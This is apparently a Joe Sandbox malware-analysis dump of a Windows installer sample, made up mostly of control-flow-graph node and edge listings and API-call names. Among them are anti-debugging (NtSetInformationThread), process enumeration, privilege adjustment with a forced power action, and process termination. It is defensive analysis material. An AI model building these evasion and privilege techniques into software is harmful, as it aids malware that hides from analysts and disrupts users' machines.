100400->100401 100402 6bf3b804 std::ios_base::_Ios_base_dtor _strlen 100401->100402 100402->100287 100403 6bf3bc26 100402->100403 100404 6bf3bc0f 100402->100404 100407 6bf3bbbd _Yarn _strlen 100402->100407 100406 6c0b6fb3 std::_Facet_Register 4 API calls 100403->100406 100405 6c0b6fb3 std::_Facet_Register 4 API calls 100404->100405 100405->100407 100406->100407 100407->100304 100408 6bf3c075 100407->100408 100409 6bf3c08e 100407->100409 100412 6bf3c028 _Yarn 100407->100412 100410 6c0b6fb3 std::_Facet_Register 4 API calls 100408->100410 100411 6c0b6fb3 std::_Facet_Register 4 API calls 100409->100411 100410->100412 100411->100412 100413 6c0b5ed0 104 API calls 100412->100413 100418 6bf3c0db std::ios_base::_Ios_base_dtor _strlen 100413->100418 100414 6bf3c7a5 100416 6c0b6fb3 std::_Facet_Register 4 API calls 100414->100416 100415 6bf3c7bc 100417 6c0b6fb3 std::_Facet_Register 4 API calls 100415->100417 100425 6bf3c753 _Yarn _strlen 100416->100425 100417->100425 100418->100287 100418->100414 100418->100415 100418->100425 100419 6bf3d406 100422 6c0b6fb3 std::_Facet_Register 4 API calls 100419->100422 100420 6bf3d3ed 100421 6c0b6fb3 std::_Facet_Register 4 API calls 100420->100421 100423 6bf3d39a _Yarn 100421->100423 100422->100423 100424 6c0b5ed0 104 API calls 100423->100424 100426 6bf3d458 std::ios_base::_Ios_base_dtor _strlen 100424->100426 100425->100304 100425->100419 100425->100420 100425->100423 100431 6bf3cb2f 100425->100431 100426->100287 100427 6bf3d8a4 100426->100427 100428 6bf3d8bb 100426->100428 100432 6bf3d852 _Yarn _strlen 100426->100432 100429 6c0b6fb3 std::_Facet_Register 4 API calls 100427->100429 100430 6c0b6fb3 std::_Facet_Register 4 API calls 100428->100430 100429->100432 100430->100432 100432->100304 100433 6bf3dcb6 100432->100433 100434 6bf3dccf 100432->100434 100437 6bf3dc69 _Yarn 100432->100437 100435 6c0b6fb3 std::_Facet_Register 4 API calls 100433->100435 100436 6c0b6fb3 std::_Facet_Register 4 API calls 100434->100436 100435->100437 100436->100437 
100438 6c0b5ed0 104 API calls 100437->100438 100440 6bf3dd1c std::ios_base::_Ios_base_dtor 100438->100440 100439 6c0b5560 4 API calls 100439->100370 100440->100287 100440->100439 100442 6c0b6fb8 100441->100442 100443 6c0b6fd2 100442->100443 100446 6c0b6fd4 std::_Facet_Register 100442->100446 100553 6c0bf584 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100442->100553 100443->100285 100445 6c0b7e33 std::_Facet_Register 100557 6c0b98e9 RaiseException 100445->100557 100446->100445 100554 6c0b98e9 RaiseException 100446->100554 100448 6c0b862c IsProcessorFeaturePresent 100454 6c0b8651 100448->100454 100450 6c0b7df3 100555 6c0b98e9 RaiseException 100450->100555 100452 6c0b7e13 std::invalid_argument::invalid_argument 100556 6c0b98e9 RaiseException 100452->100556 100454->100285 100456 6c0ab446 FindFirstFileA 100455->100456 100457 6c0ab444 100455->100457 100458 6c0ab480 100456->100458 100457->100456 100458->100291 100460 6c0b56c6 100459->100460 100461 6c0b5758 OpenServiceA 100460->100461 100462 6c0b579f 100460->100462 100461->100460 100462->100336 100468 6c0a0913 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 100463->100468 100464 6c0a367e CloseHandle 100464->100468 100465 6c0a44cf CloseHandle 100465->100468 100466 6c0a2a8b CloseHandle 100466->100468 100467 6bf437cb 100471 6c0b62d0 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100467->100471 100468->100464 100468->100465 100468->100466 100468->100467 100469 6c08c750 WriteFile WriteFile WriteFile ReadFile 100468->100469 100558 6c08bca0 100468->100558 100469->100468 100471->100303 100473 6bf56bd5 100472->100473 100569 6bf82020 100473->100569 100475 6bf56c68 100476 6c0b6fb3 std::_Facet_Register 4 API calls 100475->100476 100477 6bf56ca0 100476->100477 100586 6c0b7897 100477->100586 100479 6bf56cb4 100598 6bf81d90 100479->100598 100482 6bf56d8e 100482->100347 100484 6bf56dc8 100606 6bf826e0 24 API calls 4 library calls 100484->100606 100486 6bf56dda 
100607 6c0b98e9 RaiseException 100486->100607 100488 6bf56def 100489 6bf7e010 67 API calls 100488->100489 100490 6bf56e0f 100489->100490 100490->100347 100492 6bf56e9f 100491->100492 100495 6bf56eb3 100492->100495 101003 6bf83560 32 API calls std::_Xinvalid_argument 100492->101003 100497 6bf56f5b 100495->100497 101005 6bf82250 30 API calls 100495->101005 101006 6bf826e0 24 API calls 4 library calls 100495->101006 101007 6c0b98e9 RaiseException 100495->101007 100498 6bf56f6e 100497->100498 101004 6bf837e0 32 API calls std::_Xinvalid_argument 100497->101004 100498->100347 100502 6bf5709e 100501->100502 100504 6bf570d1 100501->100504 101008 6bf801f0 100502->101008 100503 6bf57183 100503->100336 100504->100503 101012 6bf82250 30 API calls 100504->101012 100508 6c0c1088 67 API calls 100508->100504 100509 6bf571ae 101013 6bf82340 24 API calls 100509->101013 100511 6bf571be 101014 6c0b98e9 RaiseException 100511->101014 100513 6bf571c9 100515 6bf7e04b 100514->100515 100516 6bf7e0a3 100515->100516 100517 6bf801f0 64 API calls 100515->100517 100516->100336 100518 6bf7e098 100517->100518 100519 6c0c1088 67 API calls 100518->100519 100519->100516 100520->100330 100522 6c0b563a 100521->100522 100523 6c0b55f0 WaitForSingleObject CloseHandle CloseHandle 100522->100523 100524 6c0b5653 100522->100524 100523->100522 100524->100340 100525->100351 100527 6c0b5f27 100526->100527 101060 6c0b6560 100527->101060 100529 6c0b5f38 100530 6bf56ba0 104 API calls 100529->100530 100531 6c0b5f5c 100530->100531 100536 6c0b5fc4 100531->100536 100542 6c0b5fd7 100531->100542 101079 6c0b68b0 100531->101079 101087 6bf92370 100531->101087 100532 6bf7e010 67 API calls 100533 6c0b600f std::ios_base::_Ios_base_dtor 100532->100533 100535 6bf7e010 67 API calls 100533->100535 100538 6c0b6052 std::ios_base::_Ios_base_dtor 100535->100538 101097 6c0b6100 100536->101097 100538->100390 100540 6c0b5fcc 100541 6bf57090 77 API calls 100540->100541 100541->100542 100542->100532 100543->100380 100545 6c0b5810 
std::locale::_Setgloballocale 100544->100545 100546 6c0b57e7 CloseHandle 100545->100546 100547 6c0b5890 Process32NextW 100545->100547 100548 6c0b5921 100545->100548 100549 6c0b58b5 Process32FirstW 100545->100549 100546->100545 100547->100545 100548->100308 100549->100545 100550->100327 100552->100309 100553->100442 100554->100450 100555->100452 100556->100445 100557->100448 100559 6c08bcb3 _Yarn __wsopen_s std::locale::_Setgloballocale 100558->100559 100560 6c08c6f0 100559->100560 100561 6c08c25d CreateFileA 100559->100561 100563 6c08afa0 100559->100563 100560->100468 100561->100559 100566 6c08afb3 __wsopen_s std::locale::_Setgloballocale 100563->100566 100564 6c08b959 WriteFile 100564->100566 100565 6c08b9ad WriteFile 100565->100566 100566->100564 100566->100565 100567 6c08bc88 100566->100567 100568 6c08b105 ReadFile 100566->100568 100567->100559 100568->100566 100570 6c0b6fb3 std::_Facet_Register 4 API calls 100569->100570 100571 6bf8207e 100570->100571 100572 6c0b7897 43 API calls 100571->100572 100573 6bf82092 100572->100573 100608 6bf82f60 42 API calls 4 library calls 100573->100608 100575 6bf820c8 100576 6bf8210d 100575->100576 100577 6bf82136 100575->100577 100578 6bf82120 100576->100578 100609 6c0b74fe 9 API calls 2 library calls 100576->100609 100610 6bf82250 30 API calls 100577->100610 100578->100475 100581 6bf8215b 100611 6bf82340 24 API calls 100581->100611 100583 6bf82171 100612 6c0b98e9 RaiseException 100583->100612 100585 6bf8217c 100585->100475 100587 6c0b78a3 __EH_prolog3 100586->100587 100613 6c0b7425 100587->100613 100592 6c0b78c1 100627 6c0b792a 39 API calls std::locale::_Setgloballocale 100592->100627 100593 6c0b791c 100593->100479 100595 6c0b78c9 100628 6c0b7721 HeapFree GetLastError _Yarn ___std_exception_destroy 100595->100628 100597 6c0b78df 100619 6c0b7456 100597->100619 100599 6bf81ddc 100598->100599 100600 6bf56d5d 100598->100600 100633 6c0b79b7 100599->100633 100600->100482 100605 6bf82250 30 API calls 100600->100605 100604 6bf81e82 
100605->100484 100606->100486 100607->100488 100608->100575 100609->100578 100610->100581 100611->100583 100612->100585 100614 6c0b743b 100613->100614 100615 6c0b7434 100613->100615 100617 6c0b7439 100614->100617 100630 6c0b8afb EnterCriticalSection 100614->100630 100629 6c0c093d 6 API calls std::_Lockit::_Lockit 100615->100629 100617->100597 100626 6c0b77a0 6 API calls 2 library calls 100617->100626 100620 6c0c094b 100619->100620 100621 6c0b7460 100619->100621 100632 6c0c0926 LeaveCriticalSection 100620->100632 100625 6c0b7473 100621->100625 100631 6c0b8b09 LeaveCriticalSection 100621->100631 100624 6c0c0952 100624->100593 100625->100593 100626->100592 100627->100595 100628->100597 100629->100617 100630->100617 100631->100625 100632->100624 100635 6c0b79c0 100633->100635 100637 6bf81dea 100635->100637 100642 6c0c02ba 100635->100642 100636 6c0b7a0c 100636->100637 100653 6c0bffc8 65 API calls 100636->100653 100637->100600 100641 6c0bcad3 18 API calls __cftoe 100637->100641 100639 6c0b7a27 100639->100637 100654 6c0c1088 100639->100654 100641->100604 100643 6c0c02c5 __wsopen_s 100642->100643 100644 6c0c02d8 100643->100644 100645 6c0c02f8 100643->100645 100679 6c0c0690 18 API calls __cftoe 100644->100679 100649 6c0c02e8 100645->100649 100665 6c0cb37c 100645->100665 100649->100636 100653->100639 100655 6c0c1094 __wsopen_s 100654->100655 100656 6c0c10b3 100655->100656 100657 6c0c109e 100655->100657 100663 6c0c10ae 100656->100663 100860 6c0bcb19 EnterCriticalSection 100656->100860 100875 6c0c0690 18 API calls __cftoe 100657->100875 100660 6c0c10d0 100861 6c0c110c 100660->100861 100662 6c0c10db 100876 6c0c1102 LeaveCriticalSection 100662->100876 100663->100637 100666 6c0cb388 __wsopen_s 100665->100666 100681 6c0c090f EnterCriticalSection 100666->100681 100668 6c0cb396 100682 6c0cb420 100668->100682 100673 6c0cb4e2 100674 6c0cb601 100673->100674 100706 6c0cb684 100674->100706 100677 6c0c033c 100680 6c0c0365 LeaveCriticalSection 100677->100680 100679->100649 100680->100649 
100681->100668 100689 6c0cb443 100682->100689 100683 6c0cb3a3 100696 6c0cb3dc 100683->100696 100684 6c0cb49b 100701 6c0c7755 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 100684->100701 100686 6c0cb4a4 100702 6c0c4d2b HeapFree GetLastError __dosmaperr 100686->100702 100689->100683 100689->100684 100699 6c0bcb19 EnterCriticalSection 100689->100699 100700 6c0bcb2d LeaveCriticalSection 100689->100700 100690 6c0cb4ad 100690->100683 100703 6c0c718f 6 API calls std::_Lockit::_Lockit 100690->100703 100692 6c0cb4cc 100704 6c0bcb19 EnterCriticalSection 100692->100704 100695 6c0cb4df 100695->100683 100705 6c0c0926 LeaveCriticalSection 100696->100705 100698 6c0c0313 100698->100649 100698->100673 100699->100689 100700->100689 100701->100686 100702->100690 100703->100692 100704->100695 100705->100698 100707 6c0cb6a3 100706->100707 100708 6c0cb6b6 100707->100708 100712 6c0cb6cb 100707->100712 100722 6c0c0690 18 API calls __cftoe 100708->100722 100710 6c0cb617 100710->100677 100719 6c0d454e 100710->100719 100712->100712 100715 6c0cb7eb 100712->100715 100723 6c0d4418 37 API calls __cftoe 100712->100723 100714 6c0cb83b 100714->100715 100724 6c0d4418 37 API calls __cftoe 100714->100724 100715->100710 100726 6c0c0690 18 API calls __cftoe 100715->100726 100717 6c0cb859 100717->100715 100725 6c0d4418 37 API calls __cftoe 100717->100725 100727 6c0d4906 100719->100727 100722->100710 100723->100714 100724->100717 100725->100715 100726->100710 100729 6c0d4912 __wsopen_s 100727->100729 100728 6c0d4919 100745 6c0c0690 18 API calls __cftoe 100728->100745 100729->100728 100730 6c0d4944 100729->100730 100736 6c0d456e 100730->100736 100735 6c0d4569 100735->100677 100747 6c0c0c3b 100736->100747 100741 6c0d45a4 100744 6c0d45d6 100741->100744 100787 6c0c4d2b HeapFree GetLastError __dosmaperr 100741->100787 100746 6c0d499b LeaveCriticalSection __wsopen_s 100744->100746 100745->100735 100746->100735 100788 6c0bc25b 100747->100788 100750 6c0c0c5f 100752 6c0bc366 
100750->100752 100797 6c0bc3be 100752->100797 100754 6c0bc37e 100754->100741 100755 6c0d45dc 100754->100755 100812 6c0d4a5c 100755->100812 100761 6c0d460e __dosmaperr 100761->100741 100762 6c0d4702 GetFileType 100763 6c0d470d GetLastError 100762->100763 100764 6c0d4754 100762->100764 100841 6c0bff62 __dosmaperr 100763->100841 100842 6c0d1d20 SetStdHandle __dosmaperr __wsopen_s 100764->100842 100765 6c0d46d7 GetLastError 100765->100761 100766 6c0d4685 100766->100762 100766->100765 100840 6c0d49c7 CreateFileW 100766->100840 100769 6c0d471b CloseHandle 100769->100761 100784 6c0d4744 100769->100784 100771 6c0d46ca 100771->100762 100771->100765 100772 6c0d4775 100773 6c0d47c1 100772->100773 100843 6c0d4bd6 70 API calls 2 library calls 100772->100843 100777 6c0d47c8 100773->100777 100857 6c0d4c80 70 API calls 2 library calls 100773->100857 100776 6c0d47f6 100776->100777 100778 6c0d4804 100776->100778 100844 6c0cbe95 100777->100844 100778->100761 100780 6c0d4880 CloseHandle 100778->100780 100858 6c0d49c7 CreateFileW 100780->100858 100782 6c0d48ab 100783 6c0d48b5 GetLastError 100782->100783 100782->100784 100785 6c0d48c1 __dosmaperr 100783->100785 100784->100761 100859 6c0d1c8f SetStdHandle __dosmaperr __wsopen_s 100785->100859 100787->100744 100789 6c0bc27b 100788->100789 100790 6c0bc272 100788->100790 100789->100790 100791 6c0c4f22 __Getctype 37 API calls 100789->100791 100790->100750 100796 6c0c6f45 5 API calls std::_Lockit::_Lockit 100790->100796 100792 6c0bc29b 100791->100792 100793 6c0c5498 __Getctype 37 API calls 100792->100793 100794 6c0bc2b1 100793->100794 100795 6c0c54c5 __cftoe 37 API calls 100794->100795 100795->100790 100796->100750 100798 6c0bc3cc 100797->100798 100799 6c0bc3e6 100797->100799 100802 6c0bc34c __wsopen_s HeapFree GetLastError 100798->100802 100800 6c0bc3ed 100799->100800 100801 6c0bc40c 100799->100801 100804 6c0bc3d6 __dosmaperr 100800->100804 100805 6c0bc30d __wsopen_s HeapFree GetLastError 100800->100805 100803 6c0c4db3 __fassign 
MultiByteToWideChar 100801->100803 100802->100804 100808 6c0bc41b 100803->100808 100804->100754 100805->100804 100806 6c0bc422 GetLastError 100806->100804 100807 6c0bc448 100807->100804 100810 6c0c4db3 __fassign MultiByteToWideChar 100807->100810 100808->100806 100808->100807 100809 6c0bc30d __wsopen_s HeapFree GetLastError 100808->100809 100809->100807 100811 6c0bc45f 100810->100811 100811->100804 100811->100806 100813 6c0d4a97 100812->100813 100815 6c0d4a7d 100812->100815 100814 6c0d49ec __wsopen_s 18 API calls 100813->100814 100819 6c0d4acf 100814->100819 100815->100813 100816 6c0c0690 __cftoe 18 API calls 100815->100816 100816->100813 100817 6c0d4afe 100818 6c0d5e81 __wsopen_s 18 API calls 100817->100818 100825 6c0d45f9 100817->100825 100820 6c0d4b4c 100818->100820 100819->100817 100822 6c0c0690 __cftoe 18 API calls 100819->100822 100821 6c0d4bc9 100820->100821 100820->100825 100823 6c0c06bd __Getctype 11 API calls 100821->100823 100822->100817 100824 6c0d4bd5 100823->100824 100825->100761 100826 6c0d1b7c 100825->100826 100827 6c0d1b88 __wsopen_s 100826->100827 100828 6c0c090f std::_Lockit::_Lockit EnterCriticalSection 100827->100828 100830 6c0d1b8f 100828->100830 100829 6c0d1bd6 100832 6c0d1c86 __wsopen_s LeaveCriticalSection 100829->100832 100830->100829 100831 6c0d1bb4 100830->100831 100836 6c0d1c23 EnterCriticalSection 100830->100836 100833 6c0d1db2 __wsopen_s 11 API calls 100831->100833 100834 6c0d1bf6 100832->100834 100835 6c0d1bb9 100833->100835 100834->100761 100839 6c0d49c7 CreateFileW 100834->100839 100835->100829 100837 6c0d1f00 __wsopen_s EnterCriticalSection 100835->100837 100836->100829 100838 6c0d1c30 LeaveCriticalSection 100836->100838 100837->100829 100838->100830 100839->100766 100840->100771 100841->100769 100842->100772 100843->100773 100845 6c0d1b12 __wsopen_s 18 API calls 100844->100845 100848 6c0cbea5 100845->100848 100846 6c0cbeab 100847 6c0d1c8f __wsopen_s SetStdHandle 100846->100847 100853 6c0cbf03 __dosmaperr 100847->100853 
100848->100846 100849 6c0d1b12 __wsopen_s 18 API calls 100848->100849 100856 6c0cbedd 100848->100856 100851 6c0cbed4 100849->100851 100850 6c0d1b12 __wsopen_s 18 API calls 100852 6c0cbee9 CloseHandle 100850->100852 100854 6c0d1b12 __wsopen_s 18 API calls 100851->100854 100852->100846 100855 6c0cbef5 GetLastError 100852->100855 100853->100761 100854->100856 100855->100846 100856->100846 100856->100850 100857->100776 100858->100782 100859->100784 100860->100660 100862 6c0c112e 100861->100862 100863 6c0c1119 100861->100863 100867 6c0c1129 100862->100867 100877 6c0c1229 100862->100877 100899 6c0c0690 18 API calls __cftoe 100863->100899 100867->100662 100871 6c0c1151 100892 6c0cbe08 100871->100892 100873 6c0c1157 100873->100867 100900 6c0c4d2b HeapFree GetLastError __dosmaperr 100873->100900 100875->100663 100876->100663 100878 6c0c1143 100877->100878 100879 6c0c1241 100877->100879 100883 6c0c8cae 100878->100883 100879->100878 100880 6c0ca1d0 18 API calls 100879->100880 100881 6c0c125f 100880->100881 100901 6c0cc0dc 100881->100901 100884 6c0c114b 100883->100884 100885 6c0c8cc5 100883->100885 100887 6c0ca1d0 100884->100887 100885->100884 100990 6c0c4d2b HeapFree GetLastError __dosmaperr 100885->100990 100888 6c0ca1dc 100887->100888 100889 6c0ca1f1 100887->100889 100991 6c0c0690 18 API calls __cftoe 100888->100991 100889->100871 100891 6c0ca1ec 100891->100871 100893 6c0cbe2e 100892->100893 100895 6c0cbe19 __dosmaperr 100892->100895 100894 6c0cbe77 __dosmaperr 100893->100894 100896 6c0cbe55 100893->100896 101000 6c0c0690 18 API calls __cftoe 100894->101000 100895->100873 100992 6c0cbf31 100896->100992 100899->100867 100900->100867 100902 6c0cc0e8 __wsopen_s 100901->100902 100903 6c0cc13a 100902->100903 100905 6c0cc1a3 __dosmaperr 100902->100905 100908 6c0cc0f0 __dosmaperr 100902->100908 100912 6c0d1f00 EnterCriticalSection 100903->100912 100942 6c0c0690 18 API calls __cftoe 100905->100942 100906 6c0cc140 100910 6c0cc15c __dosmaperr 100906->100910 100913 6c0cc1ce 
100906->100913 100908->100878 100941 6c0cc19b LeaveCriticalSection __wsopen_s 100910->100941 100912->100906 100914 6c0cc1f0 100913->100914 100940 6c0cc20c __dosmaperr 100913->100940 100915 6c0cc244 100914->100915 100917 6c0cc1f4 __dosmaperr 100914->100917 100916 6c0cc257 100915->100916 100951 6c0cb1d9 20 API calls __wsopen_s 100915->100951 100943 6c0cc3b0 100916->100943 100950 6c0c0690 18 API calls __cftoe 100917->100950 100922 6c0cc2ac 100924 6c0cc305 WriteFile 100922->100924 100925 6c0cc2c0 100922->100925 100923 6c0cc26d 100926 6c0cc296 100923->100926 100927 6c0cc271 100923->100927 100928 6c0cc329 GetLastError 100924->100928 100924->100940 100930 6c0cc2cb 100925->100930 100931 6c0cc2f5 100925->100931 100953 6c0cc421 43 API calls 5 library calls 100926->100953 100927->100940 100952 6c0cc7cb 6 API calls __wsopen_s 100927->100952 100928->100940 100934 6c0cc2e5 100930->100934 100935 6c0cc2d0 100930->100935 100956 6c0cc833 7 API calls 2 library calls 100931->100956 100955 6c0cc9f7 8 API calls 3 library calls 100934->100955 100936 6c0cc2d5 100935->100936 100935->100940 100954 6c0cc90e 7 API calls 2 library calls 100936->100954 100939 6c0cc2e3 100939->100940 100940->100910 100941->100908 100942->100908 100957 6c0d1f55 100943->100957 100945 6c0cc3c1 100946 6c0cc268 100945->100946 100962 6c0c4f22 GetLastError 100945->100962 100946->100922 100946->100923 100949 6c0cc3fe GetConsoleMode 100949->100946 100950->100940 100951->100916 100952->100940 100953->100940 100954->100939 100955->100939 100956->100939 100958 6c0d1f62 100957->100958 100960 6c0d1f6f 100957->100960 100958->100945 100959 6c0d1f7b 100959->100945 100960->100959 100961 6c0c0690 __cftoe 18 API calls 100960->100961 100961->100958 100963 6c0c4f39 100962->100963 100964 6c0c4f3f 100962->100964 100966 6c0c7093 __Getctype 6 API calls 100963->100966 100965 6c0c70d2 __Getctype 6 API calls 100964->100965 100968 6c0c4f45 SetLastError 100964->100968 100967 6c0c4f5d 100965->100967 100966->100964 100967->100968 100969 
6c0c4f61 100967->100969 100975 6c0c4fd9 100968->100975 100976 6c0c4fd3 100968->100976 100970 6c0c7755 __Getctype EnterCriticalSection LeaveCriticalSection HeapAlloc 100969->100970 100972 6c0c4f6d 100970->100972 100973 6c0c4f8c 100972->100973 100974 6c0c4f75 100972->100974 100979 6c0c70d2 __Getctype 6 API calls 100973->100979 100977 6c0c70d2 __Getctype 6 API calls 100974->100977 100978 6c0c1039 __Getctype 35 API calls 100975->100978 100976->100946 100976->100949 100980 6c0c4f83 100977->100980 100981 6c0c4fde 100978->100981 100982 6c0c4f98 100979->100982 100985 6c0c4d2b _free HeapFree GetLastError 100980->100985 100983 6c0c4f9c 100982->100983 100986 6c0c4fad 100982->100986 100984 6c0c70d2 __Getctype 6 API calls 100983->100984 100984->100980 100987 6c0c4f89 100985->100987 100988 6c0c4d2b _free HeapFree GetLastError 100986->100988 100987->100968 100989 6c0c4fbf 100988->100989 100989->100968 100990->100884 100991->100891 100993 6c0cbf3d __wsopen_s 100992->100993 101001 6c0d1f00 EnterCriticalSection 100993->101001 100995 6c0cbf4b 100996 6c0cbe95 __wsopen_s 21 API calls 100995->100996 100997 6c0cbf78 100995->100997 100996->100997 101002 6c0cbfb1 LeaveCriticalSection __wsopen_s 100997->101002 100999 6c0cbf9a 100999->100895 101000->100895 101001->100995 101002->100999 101003->100495 101004->100498 101005->100495 101006->100495 101007->100495 101009 6bf8022e 101008->101009 101010 6bf570c4 101009->101010 101015 6c0c1d4b 101009->101015 101010->100508 101012->100509 101013->100511 101014->100513 101016 6c0c1d59 101015->101016 101017 6c0c1d76 101015->101017 101016->101017 101018 6c0c1d7a 101016->101018 101019 6c0c1d66 101016->101019 101017->101009 101023 6c0c1f72 101018->101023 101031 6c0c0690 18 API calls __cftoe 101019->101031 101024 6c0c1f7e __wsopen_s 101023->101024 101032 6c0bcb19 EnterCriticalSection 101024->101032 101026 6c0c1f8c 101033 6c0c1f2f 101026->101033 101030 6c0c1dac 101030->101009 101031->101017 101032->101026 101041 6c0c8b16 101033->101041 101039 6c0c1f69 
101040 6c0c1fc1 LeaveCriticalSection 101039->101040 101040->101030 101042 6c0ca1d0 18 API calls 101041->101042 101043 6c0c8b27 101042->101043 101044 6c0d1f55 __wsopen_s 18 API calls 101043->101044 101045 6c0c8b2d __wsopen_s 101044->101045 101046 6c0c1f43 101045->101046 101058 6c0c4d2b HeapFree GetLastError __dosmaperr 101045->101058 101048 6c0c1dae 101046->101048 101050 6c0c1dc0 101048->101050 101052 6c0c1dde 101048->101052 101049 6c0c1dce 101059 6c0c0690 18 API calls __cftoe 101049->101059 101050->101049 101050->101052 101055 6c0c1df6 _Yarn 101050->101055 101057 6c0c8bc9 62 API calls 101052->101057 101053 6c0c1229 62 API calls 101053->101055 101054 6c0ca1d0 18 API calls 101054->101055 101055->101052 101055->101053 101055->101054 101056 6c0cc0dc __wsopen_s 62 API calls 101055->101056 101056->101055 101057->101039 101058->101046 101059->101052 101061 6c0b6595 101060->101061 101062 6bf82020 52 API calls 101061->101062 101063 6c0b6636 101062->101063 101064 6c0b6fb3 std::_Facet_Register 4 API calls 101063->101064 101065 6c0b666e 101064->101065 101066 6c0b7897 43 API calls 101065->101066 101067 6c0b6682 101066->101067 101068 6bf81d90 89 API calls 101067->101068 101069 6c0b672b 101068->101069 101070 6c0b675c 101069->101070 101112 6bf82250 30 API calls 101069->101112 101070->100529 101072 6c0b6796 101113 6bf826e0 24 API calls 4 library calls 101072->101113 101074 6c0b67a8 101114 6c0b98e9 RaiseException 101074->101114 101076 6c0b67bd 101077 6bf7e010 67 API calls 101076->101077 101078 6c0b67cf 101077->101078 101078->100529 101080 6c0b68fd 101079->101080 101115 6c0b6b10 101080->101115 101082 6c0b69ec 101082->100531 101085 6c0b6915 101085->101082 101133 6bf82250 30 API calls 101085->101133 101134 6bf826e0 24 API calls 4 library calls 101085->101134 101135 6c0b98e9 RaiseException 101085->101135 101088 6bf923af 101087->101088 101091 6bf923c3 101088->101091 101144 6bf83560 32 API calls std::_Xinvalid_argument 101088->101144 101093 6bf9247e 101091->101093 101146 6bf82250 30 API 
calls 101091->101146 101147 6bf826e0 24 API calls 4 library calls 101091->101147 101148 6c0b98e9 RaiseException 101091->101148 101094 6bf92491 101093->101094 101145 6bf837e0 32 API calls std::_Xinvalid_argument 101093->101145 101094->100531 101098 6c0b610e 101097->101098 101101 6c0b6141 101097->101101 101099 6bf801f0 64 API calls 101098->101099 101102 6c0b6134 101099->101102 101100 6c0b61f3 101100->100540 101101->101100 101149 6bf82250 30 API calls 101101->101149 101104 6c0c1088 67 API calls 101102->101104 101104->101101 101105 6c0b621e 101150 6bf82340 24 API calls 101105->101150 101107 6c0b622e 101151 6c0b98e9 RaiseException 101107->101151 101109 6c0b6239 101110 6bf7e010 67 API calls 101109->101110 101111 6c0b6292 std::ios_base::_Ios_base_dtor 101110->101111 101111->100540 101112->101072 101113->101074 101114->101076 101116 6c0b6b78 101115->101116 101117 6c0b6b4c 101115->101117 101120 6c0b6b89 101116->101120 101136 6bf83560 32 API calls std::_Xinvalid_argument 101116->101136 101119 6c0b6b71 101117->101119 101138 6bf82250 30 API calls 101117->101138 101119->101085 101120->101119 101137 6bf82f60 42 API calls 4 library calls 101120->101137 101122 6c0b6d58 101139 6bf82340 24 API calls 101122->101139 101124 6c0b6d67 101140 6c0b98e9 RaiseException 101124->101140 101128 6c0b6d97 101142 6bf82340 24 API calls 101128->101142 101130 6c0b6dad 101143 6c0b98e9 RaiseException 101130->101143 101132 6c0b6bc3 101132->101119 101141 6bf82250 30 API calls 101132->101141 101133->101085 101134->101085 101135->101085 101136->101120 101137->101132 101138->101122 101139->101124 101140->101132 101141->101128 101142->101130 101143->101119 101144->101091 101145->101094 101146->101091 101147->101091 101148->101091 101149->101105 101150->101107 101151->101109 101152 6bf33d62 101154 6bf33bc0 101152->101154 101153 6bf33e8a GetCurrentThread NtSetInformationThread 101155 6bf33eea 101153->101155 101154->101153 101156 6bf44a27 101157 6bf44a5d _strlen 101156->101157 101158 6bf5639e 101157->101158 
                            • (continuation of the preceding control-flow graph; the edge list is omitted. API calls on its paths: FindFirstFileA, CreateFileA, CreateProcessA, WaitForSingleObject, CloseHandle, Sleep, GetCurrentProcess, TerminateProcess, GetLastError, ExitThread, GetPEB, HeapFree, GetConsoleMode, ReadFile, ReadConsoleW, IsProcessorFeaturePresent, RaiseException, EnterCriticalSection, LeaveCriticalSection.)
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: HR^
                            • API String ID: 4218353326-1341859651
                            • Opcode ID: cf331f166b1c8fe20b05ee52023a42077380e29563e3f354f4c22fff3130a6e4
                            • Instruction ID: d0c6ab674e5058f5ff3212f5822196d0315a475951abec339a2b74ef11c52e2c
                            • Opcode Fuzzy Hash: cf331f166b1c8fe20b05ee52023a42077380e29563e3f354f4c22fff3130a6e4
                            • Instruction Fuzzy Hash: AF74F772644B018FC728CF28C8D0695B7F3EF95314B198A6DC0D68B765EB78B54ACB90
                            Strings
                            Similarity
                            • API ID:
                            • String ID: }jk$;T55$L@^
                            • API String ID: 0-4218709813
                            • Opcode ID: 721ecaea613e7fb9418d86b5971208a9b91b95a6e0d286f10592200f9ed489bb
                            • Instruction ID: 894685dc2a8bab9efc3f5000ed9b6a3703b23fee56bf41c84c4add65dc5b1a5d
                            • Opcode Fuzzy Hash: 721ecaea613e7fb9418d86b5971208a9b91b95a6e0d286f10592200f9ed489bb
                            • Instruction Fuzzy Hash: D134D9726447018FC728CF28C8D0696BBF3EF95314B198A6DC0D64B766EB78B54ACB50

                            Control-flow Graph
                            • Graph of the function starting at 6c0b57b0 (basic blocks marked executed / not executed; edge list omitted). API calls on its paths: CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, CloseHandle; internal calls to 6c0c3175 and 6c0bbe90.
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C0B57BE
                            Similarity
                            • API ID: CreateSnapshotToolhelp32
                            • String ID:
                            • API String ID: 3332741929-0
                            • Opcode ID: f30db2f3ef4569c30f32fcb586ecb9f2b11b6dc3121716111b7fb49b7e7b012a
